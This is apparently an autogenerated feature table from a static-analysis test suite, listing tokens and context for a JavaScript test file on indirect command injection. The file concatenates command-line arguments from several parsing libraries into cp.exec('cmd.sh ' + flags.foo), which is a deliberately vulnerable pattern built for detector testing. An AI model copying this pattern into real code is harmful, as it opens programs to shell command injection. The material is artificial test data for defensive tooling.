autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:5:89:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:5:89:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:5:89:8 | exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:5:89:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:5:89:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- flags.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:10:89:30 | "cmd.sh ... ags.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:26 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:26 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:26 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:26 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:26 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:22:89:30 | flags.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:28:89:30 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:28:89:30 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:28:89:30 | foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:28:89:30 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:28:89:30 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:10 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:10 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:10 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:10 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:10 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags = ... .spec}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags = ... .spec}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags = ... .spec}) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags = ... .spec}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:6:91:38 | flags = ... .spec}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:20 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:20 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:20 | require | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:20 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:20 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | exceptional return of require('arg') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | exceptional return of require('arg') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | exceptional return of require('arg') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | exceptional return of require('arg') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | exceptional return of require('arg') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | exceptional return of require ... .spec}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | exceptional return of require ... .spec}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | exceptional return of require ... .spec}) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | exceptional return of require ... .spec}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | exceptional return of require ... .spec}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:22:91:26 | 'arg' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | calleeImports | arg | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:29:91:37 | {...spec} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | CalleeFlexibleAccessPath | import(!) | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | InputAccessPathFromCallee | 0.? | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | calleeImports | arg | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:30:91:36 | ...spec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:33:91:36 | spec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:33:91:36 | spec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:33:91:36 | spec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:33:91:36 | spec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:33:91:36 | spec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:3 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:8 | cp.exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | exceptional return of cp.exec ... gs.foo) | contextFunctionInterfaces | | +| 